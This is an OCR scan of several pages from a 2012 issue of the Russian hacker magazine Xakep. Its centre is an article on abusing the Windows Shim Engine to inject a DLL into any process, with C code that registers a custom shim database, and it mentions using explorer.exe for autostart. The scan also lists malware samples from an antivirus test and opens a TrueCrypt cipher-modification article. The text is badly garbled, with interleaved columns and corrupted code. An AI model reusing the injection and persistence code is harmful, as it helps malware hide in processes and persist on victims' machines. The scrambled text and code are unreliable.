требу ющего о плат ы за разблокировку. Не отказались мы и от

предст а вител е й самых разны х областей зловредного мира . Один

мобильного сек тора- троянец, отправляющий СМС на nлатны е

из вредоносов << выбрасывает из себя •• множество разнообразной

ном ера, тоже поnал в ис с л едование. Кроме того в тесте у частвовала

ма лвари- троянцев, бэкдоров и проч ей н еч исти . Этим и объяс ня ется

моше ннич еская прогр амма, относя щая сяк ка тегории << nлатны х

удивившее автора рас хож дение в количестве д е т ектов. Др у гой вообще

архи вов •• !такие програ ммы требую т отnравить СМС на преми ум -ном е р

представляет собой с криnт на языке

якобы за получени е д осту п а к заа рхивированному файлуl. Такж е был

VBS,

основными назначениями

ко торого являются загрузка и запуск другого троянца. Еще в файла х,

учас тв ую щи х в тест е, присутствов а л экс плойт, эксn л уа тирующий

CVE-

nротестирован РОF -эксплойт, вариации которого широ ко и с поль зую тс я в экс пло йт -пака х для пров е д ения dгive-by атак. Наконец, в т есте

201-0611 . Ск риптовый т роя н-загрузчик , ана логичный выш ео пи са нном у, но созданный на JS, тоже п опал в выборку. Не обошлось и без

участвовали троянец , выполняющий множество дестр уктив ны х

w inlockeг 'a - вредоноса, блокирующего р аботу систе мы , а затем

и заnуск зловре д а.

действий , и вредоносный flash-фaйл, осу щ еств ляющий за гр узку

ХАКЕР

082

www.epidemz.net

04/159/2012


Preview КОДИНГ ТRUЕ-КРИПТОВАНИЕ

088

CerOI\HЯ у нас сложная задача- сделать шифравалку данных, которая nозволя­ ла бы создавать невидимые в системе контейнеры и использовала собствен ­ ный криптографический алгоритм. За основу мы возьмем известную программу

TrueCrypt, которая расnространяется с открытыми исходниками. Убедившись в отсутствии в ней закладок, мы создадим

•доверенный»бил дутилиты ,вкотором точно будет все о к. Недоверие к зару­ беж ным шифрам и здоровый патриотизм наталкивают на мысль реализовать

отечественныекриптографические ал­ горитмы, которые во многом не устуn ают

зарубежным аналогам. Этим и займемся,

благо сделать это не сильно-то и с ложн о.

КОДИНГ

UNIXOID /

\ SHIM: НОВЫЙ МЕТОДИНЖЕКТА

ЗВЕНЬЯ ОДНОЙ ЦЕПИ

Способы инжекта кода в атакуемое nри­

Одним из главн ых новше с тв ядра

ложение давно известны. Однако оста­

вереи и

лись такие технологии как

Linux

2.6 стала поддержка виртуальной файловой систе мы sysfs. Как это может

Shim Епg iпе,

которые еще могуттебя удивить.

быть полезно обычным n о льзователям?

SYN\ACK

11

НЕИЗМЕННО ВЫСОКАЯ ДОСТУПНОСТЬ

HOWTO: как создать высокоnроизводи­ тельный и устойчивый к сбоям файловый сервиснабазеnарочкистареньк их

серверов и Samba.

ХАКЕР

11

БИТВЫ ЗЕЛЕНЫХ РОБОТОВ

Стандартная прошивка для Апdгоid­ смартфона -удел тети Клавы, когда есть

мощные альтернативные СуапоgепМоd и

firmware в лице

MIUI.

FERRUM

СВЕЖЕЕДЫХАНИЕ В этом году корпорация

Microsoft прак­

тически полностью обновит линейки своих основных nродуктов. Кратко nрой­ демся по всем основным новинкам

2012.

04/159/2012

СЕТЕВОЙ ФОРСАЖ Редакциярешила , наконе~обновить свои старые точки доступа. Берем пять топовых беспроводных маршрутизато­ ров и выбираем из них лучший.

083

www.epidemz.net


~

новы и метод инжекта ИСПОЛЬЗОВАНИЕ SH IM ENGINE ДЛЯ ВНЕДРЕНИЯ КОДА И АВТОЗАГРУЗКИ

Существует множество с по соб ов инжекта кода в атакуемое прилож е ние , это и правка им порта ст оронней

dll redirection, и соз дани е уд ален ног о с адресом Loadl ibrary. С пос обов уйма,

аре

но все эти

способы довольно хо рошо известны. Можн о ли удивить чем ­

то искуш ен ного читател я ? Попробуем.

На уровне пользователя посмотреть на режимы совместимости можно на соо тветствующей вкладке свойств любого исполняемого

f-

дут замене ны функции в таблице импорта приложения есть механизм обратн ой сов местимости в банальным перехватом

Windows

Свойства

-7 Совмест имость -7 -7 Windows95

Режим

будет использоваться шим совместимости с

Windows 95

Что значит «буд ет использоваться>>? Это з начит, что из стан­

дартной базы шимов будет извлеченанекоторая информация, на ос нове нее будет загружена стандартная

dll

для сов местимо с ти ,

в которой есть опять-таки стандартные функции. И именно ими бу-

some.exe.

То

обеспечивается

AP I.

И спользова ни е шимов позволяет о ч ень многое, от простых вещ ей вроде добавл ения флагов в РЕВ, до виртуализации реестра

и полного изменения пов еден ия Неар Мапаgег'а. К примеру, шим, виртуализирующий реестр, перехватывает

практически все функции работы с реестром в

файла:

Совместимости

и атака

потока, и пос ылка

ЧТО ТАКОЕ SHIMЪI? Shim Engin e - это технология для обесnечения совместимости старших версий Windows с младшими, реали зованная в различ­ ных dll, а также через некоторые калбеки и хаки в РЕ -заг рузчике библиотеки ntdll.dll.

some. ехе -7

dll,

типа

ADVAP 132.DLL:

RegConnectRegistryA, RegConnectRegistryW, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExW,RegCloseKey, RegOpenKeyW, RegQueryValueA, RegQueryValueW, RegCreateKeyA, RegCreateKeyW, RegCreateKeyExA, RegCreateKeyExW, RegEnumValueA, RegEnumValueW, RegEnumKeyA, RegEnumKeyW, RegEnumKeyExA, RegEnumKeyExW, RegQueryinfoKeyA, RegQueryinfoKeyW, RegSetValueExA, RegSetValueExW, RegDeleteKeyA, RegDeleteKeyW

www.epidemz.net


Добавляем свое nриложение в ЕМЕТ

Включаем режим логирования шимов

Далее мы разберемся, как работает

Shim Engine и как его мож­

но исnользовать в наших целях, а цели у нас nростые- загрузить

сво й код в чужой nроцесс.

(HKEY_CURRENT_USER \Software \Microsoft\Windows NT \ CurrentVersion \ AppCompatFlags\ Layer s ] "C: \\Doc uments and S e tt i n gs\\ Admin \ \Paбoчий cтoл \\test. exe" ="WIN2eee "

ИССЛЕДУЕМ ШИМЫ Чтобы n о на б люд ать ра бо т у шимов, можн о включить режим

Как видишь, о н а указывает, что для

test.exe должен nри­ Win2000. Вероятно, это значит, что мы можем

логирования. Дл я эт ог о надо установи ть системную nеременную

меняться шим

о кружения

устанавливать режим совместимости любому nриложению nри­

SHIMENG_ DEBUG _ LEVEL равной 4 и nерезагрузиться [nерезагрузка требуется nри любых и зменениях или добавлениях

системных nеременных окружения !.

кода мы должны не столько nроnисать, сколько установить для

Если nосле этого заnусти ть любое nриложение [nусть это будет б л окнот, nереименованный в test.exel в р ежи м е совместимости с, наnример,

нудительно. Это нам nригодит ся. Однако для внедрения своего

Windows 2000 и включить WinDbg , можно наблюдать

любоnытные лаги. Н аnример, такие:

него свой

[IJ режим совместимости. То есть nридется создать

и внедрить в систему свою собствен н ую базу ш имов. Решение о том, как это сделать, не лежи т на nоверхности. В ветке

AppCompatFiags больше ничего интерес н о г о нет. П оэтому nри­ дется коnнуть немного глубже.

( INFO] (SeiSet layerEnvVar] Env var set _CQ\1PAT_ LAYER="Win2000" (INFO] (SE_Dllloaded]

INIТ.

loading DLL "Aclaye rs .DLL " .

ИЩЕМ СПОСОБ ВНЕДРЕНИЯ СВОЕЙ БАЗЫ ШИМОВ Забегая вnеред, скажу, что

Shim Engine в основ н о м реализо-

ван в shime ng.dll и apphelp.dll, а базы шимов лежат в sysmain.

(MSG ] (Seiinit] Shim DLL е х 71ббееее "C: \ WINDOWS \ AppPatch \ Aclayers.DLL " loaded (MSG ] ( Seiinit] Using s нrм " Win2eeeversionlie!Aclayers.DLL"

sdb и dгvmain.sdb [в директории \W INDOW S\App Patchl, однако загрузкой стандартной dll шимов, nарси нг омбазы и nерехватом функций занимается неnосредстве нн о за гру зчик РЕ - м одулей

Windows. Тот самый, что сидит в ntdll.dll. Конечно, чтобы лучше (INFO] (Seiinit] GetHookAPis returns 3 hook s for DLL " С: \ WINOOWS \ AppPatch \ AcLayers . DLL" S НIM " Win2eeever sionlie" (MSG ] (Seiinit] Using S НIM "VirtualRegist r y!AcLayers.DLL " (MSG ] (Seiinit] Command line for Shim "VirtualRegistry " : "WIN2K " (INFO] (Seiinit] GetHookAPis return s 27 hook s for DLL "С:\ WINOOWS \ AppPatch \ Aclayers.DLL" SНIM "VirtualRegistry" (MSG ] (Seiinit] Using S НIM "DuplicateHandleFix!Aclayers .DLL " (I NFO] (Seiin i t] GetHookAPis returns 1 hooks for DLL "С :\ WINOOWS \ AppPatch \ AcLayers.DLL" S НIM "Duplic ateHandleFi x" ( INFO] (SE_Dllloaded] INIТ . loading DLL "AcGenral.DLL " . (MSG ] (Seiinit] Using SНIM " LoadLibraryCWD!AcGenral.DLL" ( INFO] (Seiinit] GetHookAPis retu r ns е hooks fo r DLL " С: \ WINOOWS \ AppPatch\AcGenral.DLL" S НIM "LoadLibraryCWD" [ MSG ] [ Seiini t] Using SНIM "Win2kPropagatelayer! Aclayers. DLL " (INFO] (Seiinit] GetHookAPis returns 3 hooks for DLL "С: \ WINOOWS \ AppPatch\Aclayers.DLL " SHIM "Win2kPropagatelayer" И з них вид но, чт о за гр узился слой

Win2000, а также

стандартная shi m d ll- C:\W IND OWS\AppPatch\Aclayeгs.DLL. П осле этого произошло извлеч ение и nрименение шимов, таких как Viгtuai R egistгy,

Dup licateHandleFix и так далее,

nонять , как внедрить свою базу, начать исследование лучше всего с момента загрузки

Shim Engine, а искать этот момент луч­

ше всего с начала работы системного загрузчика, а системн ы й загр у зчик начинает работу с аре-дисnетчера.

Но мы не будем закаnываться в такие недра и начнем с функции инициализации вышеуnомянутого загрузчика РЕ-файлов:

_Ldrp initializeProcess: .text:7C921B36 mov .text:7C92 1B ЗC mov

еЬх,

еах,

large fs: 18h ; ТЕВ (еах+Зеh ] ; РЕВ

.text:7C921B62 .text:7C921B68

lea mov

еах,

[ebx+1E8h ] ; peb->pShimData

есх ,

(еах]

.text:7C921B87

mov

(ebp+var_104],

есх

loc_7C921693:

.text:7C921693 .text:7C921699 .text:7C92169B .text:7C92169D

mov xor cmp jz

edi, [ebp+var_104] esi) esi edi, esi loc_7C923CD0 ULONG в peb - >pShimData

а затем уже nерехват функций [ nерехватов много, лаги n ос киn а н ы 1. В реестре тем временем сфор мир овалась следующая

ес ли

заnись:

с ов местимости

www.epidemz.net

первый

то прыгаем

( в случае включенного шима прыжка не происходит)

е,


~

Kerne l

ile

Edit

com:oope,port =\\\p~ipe\com_

View

\~lindow

Debug

.resets=lf-

wonUDg:O. IдJUUL.D'

s ; idautils.Strings( False ) s.setu p( strtypes ; Strings.STR_UNICODE

Help

13 1 ommand · Kernel

' com:pipe, port = \\ .\ p i pe\con"'_l , r~ets = O ' -

for i, v in enumerate( s ): i f v is Non e: print ( "Failed оп %d" % i ) else : print ( "%х ;) %s " % ( v.ea, str( v ) ) )

Win Dbg:6.12.0002.633 AMD64

[ INFO] [SeiHookimports] Hooking module 0:-:77110000 "OLEAUT32 . dll" [ INFO] [SeiHookimports] Hooking module 0:-: 77800000 "HSACI!32 . dll " [ШFOJ [SeiHookimports] Hooking module 0:-:778FOOOO "VERSION . dll" [INFO] [SeiHookimports] Hooking module 0:-:7С9СОООО "SHELL32 . dll " [ ШFО] [SeiHookionports] Hooking module 0:.:77 F60000 "SHLVAPI . dll " [ ШFО] [SeiHookimports] Hooking module О:-:769АОООО "USEREIIV . dll " [INFO] [SeiHooki•ports] Hooking module 0:-:58260000 "UxTheme . dll " [1/ARII] [SeiResetEntryProcessedl Don't mess vith "ntdll . dll " [1/ARII] [SeiResetEntryProcessedl Don't "ess <~ith "kernel32 . dll " [1/ARN] [SeiResetEntryProcessedl Reseting "Secur32 . dll " [YARN] [ SeiResetEntryProcessedl Reseting "RPCRТ4 . dll " [1/ARN] [ SeiResetEntryProcessedl Reseting "ADVAPI32 . dll " [1/ARN] [SeiResetEntryProcessedl Don' t mess with "ShimEng . dll" [1/ARN] [SeiResetEntryProcessedl Reseting "GDI32 . dll" [1/ARII] [SeiResetEntryProcessed l Reseting "USER32 . dll " [1/ARII] [SeiResetEntryProcessedl Reseting "1/INMM . dll " [1/ARN] [SeiResetEntryProcessedl Reseting "msvcrt. dll " [1/ARN] [SeiResetEntryProcessed] Reseting "ole32 . dll" [1/ARII] [SeiResetEntryProcessedl Reseting "OLEAUT32 . dll " [1/ARN] [SeiReset EntryProcessedl Reseting "MSACИ32 . dll " [ 1/ARII] [SeiReset En tryProcessed 1 Reset ing "VERSIOII . dll" [1/ARN] [ SeiResetEntryProcessedl Reseting "SHL\IAPI . dll " [1/ARNI [SeiResetEntryProcessedl Reseting "SHELL32 . dll" [1/ARIII [SeiResetEntryProcessedl Reseting "USEREIIV . dll " [ 1/ARII 1 [ SeiResetEn tryProcessed 1 Reset ing " UxTheme . dll • [1/ARIII [SeiResetEntryProcessedl Don't •ess vith "AcGenral . DLL " [IIIFOI [SE_Dllloadedl AFТER INIТ . loading DLL " IMM 32 . DLL ". [IIIFOI [PatchNevИodulesl Dynamic loaded modules [ IIIFOI [SeiHooklмportsl Hooking module Ох7636000 0 "IИИ32 . DLL " [IIIFOI [SE_Dllloadedl AFТER INIТ . loading DLL " comctlЗ2 . dll ". [ Il!FOI [PatchNevModulesl Dynamic loaded modules [ IIIFOI [SeiHookimportsl Hooking module О:-:77ЗСО ООО "comctl32 . dll" [ INFOI [SE_Dllloadedl АПЕR IIIIТ . loading DLL "co mctlЗ2 . dll ". [IIIFOI [PatchNevИodulesl Dynamic loaded JAodules [ Il!FOI [SeiHookionportsl Hooking module Oz5D580000 "comct l32 . dll" [III FO] [SE_Dllloadedl AFТER IIIIT . loading DLL " IПMARТA . DLL" . [IN FOI [PatchNevИodulesl Dynamic loaded modules [ IIIFOI [SeiHookimportsl Hooking module Oz77680000 " NП!ARTA . DLL" [IIIFO] [SeiHooklmportsl Hooking module Oz718DOOOO " SAИLI8 . dll " [ IIIFO] [SeiHookimportsl Hooking module 0:-: 76F50000 "I/LDAP32 . dll • [IIIFOI [SE_Dllloadedl AFТER IIIIT . loading DLL "xpsp2res . dll ". [IIIFO] [Patch llevModulesl Dynamic l oaded "odules [IIIFOI [ SE_Dllloade dl AFTER It!IT . loading DLL ""ebclnt . dll ". [IIIFOI [PatchllevИodulesl Dynamic l oaded modu les [ IIIFOI [SeiHookimportsl Hook ing module Ох5АВСОООО "vebclnt . dll " [IIIFOI [SeiHookimportsl Hooking module О :-: З F 9ЕОООО "1/IIIШEТ . dll " [ IIIFOI [SeiHookimportsl Hooking module Oz00940000 "llormal iz . dll " [IIIFOI [Sei H ookiмportsl Hooking module Оо-.45020000 "urlмon . dll " [IIIFOI [SeiHookimportsl Hooking module Оо-.40080000 "iertutil . dll "

print "Script Started . .. " EnumStrings() print "Script Ended . .. " idautils.Stгings!False) - в конструкторе по умолчанию стоит Тгuе, но так как нас интересуют nомимо обычных строк еще июни ­ кодные, то ставим

ем выведенные строки и почти в самом конце находим интересный ключ:

Sd8749be -> \ Registry\Mach ine \Soft wa re \Microsoft \Wi ndows NT \ Curren tVe rsion\AppCompatFlags \Ins talledSDB По хгеf'у добираемся до функции

SdbResolveDatabase, кото­ Da tabasePath

рая открыва ет данный ключ и смотрит значения и

DatabaseType . Далее

определяем, что данный ключ предназна ­

чен !о чудо!) для пользовательских баз шимов, которые должны быть nредс тавлены в виде GU ID 'o в !как в реестре , так и в самой базе).

Таким образом, ключ вида и

DatabaseType)- это

{GUID}

и два значения

СОЗДАНИЕ СОБСТВЕННОЙ БАЗЫ ШИМОВ Куда прописать базу, мы определили, но вопрос о том, как форми­ ровать саму базу шимов, остался открытым. А ведь это реальная

проблема, формат базы неизвестен, его придется восстанавли­ вать вручную, а это очень бол ьшая работа. Может быть, есть какой-то обходной путь? Он действительно есть, и зак лючается в использовании уже готовой базы' Все что нам нужно- найти приложение, которое использует свою

WinDbg

базу, и подменить в ней некоторые данные на наши. Приложе­

ние, которое нашел я, называется ЕМЕТ

push push mov push call

.text:7C9216AЗ

.text:7C9216A4 .text:7C9216AA .text:7C9216B8 .text:7C9216Bl ;

а

вот

IDatabasePath

все что нам нужно для прописывания базы

для конкретного nриложения.

DavReadRegistryValues/ RegQueryValueEx\/(4 ) . 11Status = 1 27 DavReadRegistryValues/RegQueryValueE:<\1 (5) . YStatus • 127 DavReadRegistryValues/ RegQueryValueEz\1 (6) . YStatus • 127 [SE_Dllloadedl AFТER IIПT . l oading DLL "cryptsvc . dll ". [PatchllevModulesl Dynaonic loaded modules [SeiHookimportsl Hooking module Oz76DOOOOO "cryptsvc . dll " [SeiHookimportsl Hooking onodule 0:<76850000 "certcli . dll "

Лоrи шимов в

defau lt_setup ; Fa lse и настраиваем setup сами. IDA библиотеке, просматрива­

Выполняем скриnт на загруженной в

Ш:~8J [~~~:~i::~~:J ~:~~~~ :~~~: ~~~iШШ ::~~blii>d~E -

ERROR : ERROR : ERROR : [IIIFOI [ IIIFOI [IIIFOI [IIIFOI

Strings.STR_C )

1

и

момен т

загру зк и

движка

lgoo.g i/9Dn5 L).

Качаем,

запускае м Pг ocess Monitoг от Руссиновича, чтобы фиксировать

edi [ebp+var_D8] [ebx+lECh ], esi edi _Ldrploa dShimEn gine@12

все действия программы , уста навливаем ЕМЕТ, запускаем С : \

Ргоgгаm

Files\ EMET \ EMET_GUI.exe, test.exe, закрываем

добавляем наш

выбираем Configuгe

Apps,

ЕМЕТ. В л агах монитора

видим, что база шимов ЕМЕТ 'а установилась в

(: \WINDOWS \

Ap pP atch\Custom\{f8c 4cc07-бdc4-41 8f-Ь72 b -304fcdbб 4052}.

шимов

sdb, В LdгploadShimEngine nервым параметром передае тся

а

dll

скопиро валась в

C:\WINDOWS\Ap pPatch \ EME T.dll .

Такж е из логов монитора получаем информацию об изме ­

shimeng.dll.

нениях в реестре. Был создан ключ SO FТ WAR E \\M icro so ft \\

LdгploadShimEngine грузит эту

dll,

получает адреса ф ун кций

Wind ows NT\\ Cu rrentVersion\\A ppCompatFlags\\Cus tom\\test.

из нее !LdгpGetShimEnginelnteгface), загружает базы шимов !SdЫnitDatabase), распаковывает их

ехе с нашим тестовым ехе, а также ключ, найденный нами

!SdbUnpackAppCompatData)

ранее- SOFТWARE\\Microsoft\\Windows

NT \\CurrentVersion\\

и nрименяет. Им енно отсюда мы узнаем, что движок совме­

AppC ompa t F la gs\\Insta ll e dS D B \\{ f8c4 cc07 -бdc4-418f-Ы2b-

стимости живет в

304fcdbб4052}.

shimeng.dll . Давай

поищем в этой

dl l строки,

содержащие ключи реестра, может быть найдем какие-нибудь недокументированные ключи, которые укажут нам, как внедрить

Как видишь, для nринудительного указания шима исполь-

зовалось не стандартное место La yeгs, а

Custom . Учтем. Теперь emet.dll и ис­

в систему свою базу шимов? Прощ е всего строки искать скриn­

открываем базу любым hех-редактором, находим

том. Я nредnочитаю nитoнlldaPython):

правляем на

test.dll. Д алее берем test.dll и закидываем в пап­ C:\WINDOWS\AppPatch\. Запускаем наш test.exe и пробуем убедиться, что tes t.dll проинжектировалась в test.exe. Для этого можно воспользоваться у тилитой vmmap lgoo.gi/SsSQn ) от того же Руссиновича. Открываем test.exe с помощью vmmap и ви­ дим в его адресном пространстве нашу dll, а значит- mission completel ку

import idaapi import idautil s import idc def EnumStrings():

www.epidemz.net


АВТОМАТИЗИРУЕМ ПРОЦЕСС Теперь напишем nрограмму, которая будет все автоматически де­ лать за на с, то есть за писывать в рее стр базу шимов и копиро вать

саму базу и

dll

к ней в системную папку [все проверки поски па ны,

полный вариант с м. на диске]:

#inc l ude <wi ndows.h > #incl ude <iostream > #define GUID L "{f8c4cce7-бdc4-418f-Ь72b-Зe4fcdbб4e52}" #define SНIM_REGKEY L"SOFTWARE \\Microsoft \\Windows NT \ \ CurrentVersion\\AppCompatFlags " BOOL RegisterShimDll()

___j-___j___j

{

key; BOOL funcResult = FALSE; wchar_t dbPath[] = L"C:\\Windows\\AppPatch\\Custom\\ " GUID L" .sdb" ; DWORD dЫуре = ех1ееее ; DWORD64 sdb = exlcc8828b22e8e82 ; НКЕУ

Dll

KEY_WRITE, NU LL, &key, NULL); RegSetValueEx(key, L"DatabasePath" , е , REG_SZ, (BYTE*)dbPath , sizeof (dbPath)); RegSetVal ueEx(key, L"DatabaseType ", е , REG_DWORD, (Р В УТЕ)&dЬТуре, sizeof (DWORD)); RegCloseKey(key) ;

создаем подраз дел Custom в AppCompatFlags RegCreateKeyEx(HKEY_LOCAL_MACHINE, SНIM_REGKEY L"\\Custom", е , NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, &key, NU LL ); RegCloseKey(key);

11

11

успешн о внедрена

return TRUE;

со здаем ключ

BOOL CopyShimFi l es()

RegCreateKeyEx(HKEY_LOCAL_MACHINE, SНIM_REGKEY L"\\Custom\\test.exe" , е , NULL , REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, &key, NULL); RegSetValueEx(key, GUID L".sdb" , е , REG_QWORD, (PBYTE )&sdb, sizeof (DWORD64)); RegCloseKey(key);

{

CreateDirectory( L"C:\\Windows \\AppPatch \\Custom" , NULL); CopyFile( GUID L". sdb ", L"C: \\Windows \\AppPatch \\Custom\\ " GUID L".sdb" , TRUE ); CopyFi le( L"test.dll" , L"C :\\Windows \\AppPatch \\test.dll" , TRUE );

RegCreateKeyEx(HKEY_LOCAL_MACHINE, SНIM_REGKEY L" \ \ InstalledSDB" , е , NULL, _OPTION_NON_VO LATI LE , KEY_W RITE, NULL, &key, NULL) ; RegCloseKey(key) ;

return TR UE;

int main () RegCreateKeyEx(HKEY_LOCAL_MACHINE, SНIM_REGKEY L" \ \ InstalledSDB\ \ " GUID, е , NULL, REG_OPTION_NON_VOLATILE,

ФУНКЦИИ

CopyShimF iles (); Registe rSh imDll (); std: :cout << "Shim inject complete ... " << std: :end l; std : :cout << "Run test.exe and use vmmap.exe to see test. dll in АР t est .exe" << std: :endl;

SHIMENG.DLL

shimeng.dll есть восемь экспортируемых функций: SE_DIIloaded- вызывается лоадером при загрузке dll; SE _DIIUnloaded- вызывается лоадером nри выгрузке dll; SE_DynamicShim- неизвестно кем вызывается ;

return

У

е;

ЗАКЛЮЧЕНИЕ

SE_Get PгocAddг ess - вызывается лоадером nри GetPгocAddгess ;

Описат~ в одной статье все преимущества столь мощной тех­

SE_Instai iAfteгlnit- вызывается лоадером после инициализации

нологии как

движка шимов ;

можно почерпнуть многое.

SE _ InstaiiBefoгelnit- вызывается лоадером сразу после того, как кодом из этой же

не получится, н о даже из этой с татьи

Во-первых, шимы дают возможность инжектирова ть ся в лю ­ бое пр иложени е средствами самой системы .

он получит указатели на данные функции;

SE_IsShimDII- вызывается

shim engine

dll;

Во-вторых, прописав шим, например, для ехрlогег.ехе,

SE _ PгocessDying- вызывается nри уничтожении процесса , то есть

этот факт может быть использован и как м етод ав тозагр узк и.

чуть раньше того момента, когда все точки входа dll ' oк nроцесса

А в-третьих, шимы дают возможнос ть еще и перехватывать

вызываются с причиной DLL _ PROCESS _ DEТACH.

функции атакуемого приложения, однако это требует д еталь ного изучения формата базы. :Н:

www.epidemz.net


КОДИНГ

Johnny Catch [johnny.catchiOgmail .coml

криптование ДОБАВЛЯЕМ ПОДДЕРЖКУ СВОИХ АЛГОРИТМОВ

BTRUECRYPT Наверняка все, кто когда-либо сталкивался с задачей создания шифрованного контейнера ,

знают о существовании программы

TrueCrypt.

Простота использования, высо к ая скорость работы , открытые исходники и ши рокие фун к циональные возможности с делали этот

шифровальщик одним из самых популярны х в мире. Сегодня речь пойдет о том, как переделать его под себя .

~TrueCrypt

GJ ~ ~

S~stem

:tolumes Dr.ve .;.о (:

F.!tVOI~es

TQ.Ois

Settings

НomepaQe

!jelp

Н

а сегодняшний день ТгuеСгурt является одной и з самых

популярных программ для создания шифрованных файловконтейнеро в , шифр ованных носителей информации, а также

Vokxne System pмtit:юn

200GВ

Encryption .alqorithm AES

System

для шифрования операционных систем. При использовании средств

E:\Archlves\B.,ckup

139М8

AES

Norma!

сутствии в коде программы и алгоритмов шифрования различных

Size

Туре

_. F: _.G:

подобного рода иногда возникает потребность удостовериться в от­ закладок, которые могут скрытно сохранять информацию о ключах. Убедившись в обратном, возникает желание сделать собственными руками <<доверен ный » билд программы, в котором точно будет все о к. Также недоверие к зарубежным шифрам и здоровый патриотизм по­ рой наталкивают на мысль добавить в данную программу отечес т вен­ ные криптографические алгоритмы, которые во многом не уступают зарубежным аналогам. Реализовать и то, и другое позволяет наличие W.pe Cache _______!]

Cre&e Volume Vokxne 1E:\Archlves\Backup

Select File ...

открытых исходных текстов ТгuеСгурt.

ПОДГОТОВКА К РАБОТЕ Пр ежде чем приступать к реализации нового алгоритма шифро­

V Never save history

Select Dev!Ce ...

вания, подготовим все, что нужно для сборки. В первую очередь нам понадобятся исходники программы, которые можно скачать

Мount

Auto-Мount

OeVICeS

Dismount дl

с официального сайта разработчика tгuecгypt.oгg lя использовал исходникиверсии

Главное окно nрограммы

TrueCrypt

пользовать

7.0al. В качестве среды разработки будем ис­ MS Visual Studio 2010 !несмотря на то, что разработчики

ХАКЕР

088

www.epidemz.net

04/159/2012


Тгuе-кри п това ни е

стан д а р та в Бе л оруссии. Этот а л го р и т м работает с блокам и д анных

с/

с

(/

длиной

128

бит и с ключами д л иной

128, 192

или

256

бит. Дл я ко­

динга я выбрал вариант шифра с 256-битным ключом. П рограммная реализация любого симме т ри ч ного шифра в ТгuеСгурt долж н а со д ержать в себе следующие т ри функ ц ии :

функ ц ию и ниц и ализа ц ии шифра, кото р ая осу щ ес т вляет выработку массива раундовых по д клю ч ей из к л юча шифрования, фу н к ц ию

шифрования и функ ц ию расшифровки блока сообщен и я. Для алгоритма

Bei T функция

инициализации будет иметь сле­

дующий вид:

void bel t_i nit ( un s i gned _int8 * k, int klen , unsigned __ int8 * ks) for (i ;

е;

i< 32 ; ++i) ks [i]

k[i];

Первый nараметр функции - массив, содержащий ключ шифрования данных, второй nараметр-длина данного к л юча,

а третий- массив раундовых подключей (его длина за д ается в коде T rueCгypt константой длина

key schedule

MAX_K EY_ LEN GTH-

макс и маль н ая

алгоритмов шифрования, поддерживающихся

Т rueCгyptl. В данной реализации функц и и

belt_init

есть д ве особенности.

Во-первых, мы знаем точно, что на вхо д будет по д аваться массив длиной в

32

байта, поэтому проверку значения

kl en

м ож н о опу­

стить (хотя можно поставить asseг t l. Второй момент- здесь мы просто один раз копируем ключ в массив раундовых ключей вместо многократного копирования ключа. П ринимая во внимание

Boot Attack,

Cold

при создании программных реализаций алгоритмов

я стремлюсь минимизировать кол и чество ключевой и нформа ц ии

С х ема работы алгоритма ВеiТ

в оперативной памяти ко м пьюте р а, и данная реализац и я ши фра создается с учетом этого.

используют MS VS 2008 SP11. Также нам понадобится 16-битный компилятор от

Microsoft, который идет в комплекте с MS Visual С++ 1.52. Эту в ерсию студ ии можно скачать по подписке MSDN, либо с рутрекера

:1.

К слову сказа т ь, 16-би т ный компилятор нужен для

Переходим к функции шифрования блока дан н ых lкодинг функции расшифровки смотри на диске!. Итак, сначала зададим несколько глобальных переменных:

оказаться н езаменимым п омощником при восстановлении данных

l iблок подста новки (SBox) uпsigned __ int8 Н [ 256 ] ; { ... };

из-за пов р ежде н ия ко д а за гр уз ч ика на жестком диске . Также

// массив с индексами

следуе т отметить, что устана в ли в ать

unsigned int Key l ndex [8][ 7] ; { . .. };

компи л я ции кода образов загрузочной дискеты, которая может

Visual С++ 1.52 тебе не нужно

подключей

-н еобходимо только распа к овать архив.

Кроме перечисленного п о т ребуются

NASM, gzip,

WiпD D K, а так­

Массив Н является блоком подстановки, который за д ается табли ­

цей (смотри стандарт СТБ 34.101.3 1-20111, второй массив пре д ставля­

же хедер ы PKSC # 11 ( д оступны на сайте RSA Data Securityl . Е сли все скача н о и ус т а н овле н о, приступаем к н астройке этого добра. В пе р вую очере д ь н ам необхо д имо добавить н есколько

ет собой индексы используемых раундовых подк л ю ч ей. Д л я ускоре­ ния работы кода некоторые операции оформим в виде макросов:

переменных среды:

1. MSVC16_ROOT со значе н ием,

р авн ы м п ути к папке

будетсоз дана после изв л ечения архива с

MSVC15, которая Micr osoftVisual С++ 1.52;

2. WINDD K_ ROOT со значе н ием, р авным пути, по которому мы уста­ нов ил и WinDDK; 3. PKCS11_ 1N C со значением, равным пути к папке с Р КСS # 11-

#define HUl (x ,H ) ((( unsigned __int32 ) ( Н)[ Ul ( (x)) ]) < < 24 ) #define HU 2(x ,H ) ((( unsigned __int32 ) ( Н ) [ U2(( x)) ]) << 16 ) #define НU З(х ,Н) ((( unsigned __ int32 ) (Н ) [ U З (( х ) ) ]) << 8)

хедерами.

Д альше п одкорректируем значение переменной РАТН , к кото ­

рой добавим пути к ехе'шникам от

NAS M и gzip. П осле правок пере­

РЕЖИМХТS

менных среды может п отребоваться п ерезагрузка компьютера. Д ля прове рки ко р рек тн ос ти п ра в ок РАТН по п робуй открыть коман д ную

строку, п ерейти в коре н ь ди ска С :\ и запуст ить gzi p.exe. Е сли за­

XTS- основной

режим работы блочных шифров в программе

пуск про ш ел успе ш но, т о все о к. Р аз все ус т ановлено и настроено,

TrueCгypt. По сути , данный режим является слегка измененным

попробуем сделать билд

режимом ХЕХ , который был разработан Филиппом Рогауэем в

TrueCrypt:

распако вы ваем исхо д ники,

2003

открываем солюшн в Visual Studio (попутно его конвертируем!, вы­

году . Отличия между режимами заключаются в том, что ХЕХ для

бираем конфигурацию

двух различных целей использует один и тот же ключ, в то время

Release

All

и жмем

Build.

Есл и в се хоро ш о, то в папке

окажется свежеекомпи лир ова нн ый

TrueC r ypt. Те п е рь

давай д оба в им в н его n о дд е р жку нового ал г оритма ш и фрован и я.

как

XTS

использует два независимых ключа. В

был одобрен

NIST для

в устройства х х ранения информации. Также в

КОДИНГАЛГОРИТМА

был одобрен

В ка ч естве а лгорит м а ш иф р ования для встраи в ани я я выбрал сим­ метрич н ый алго р итм

ХАКЕР

Bei T,

2010

году режим

XTS

обеспечения конфиденциальности данных

IEEE IIEEE 16191. Схему

2007

работы режима

этот режим

XTS

смотри

на рисунке.
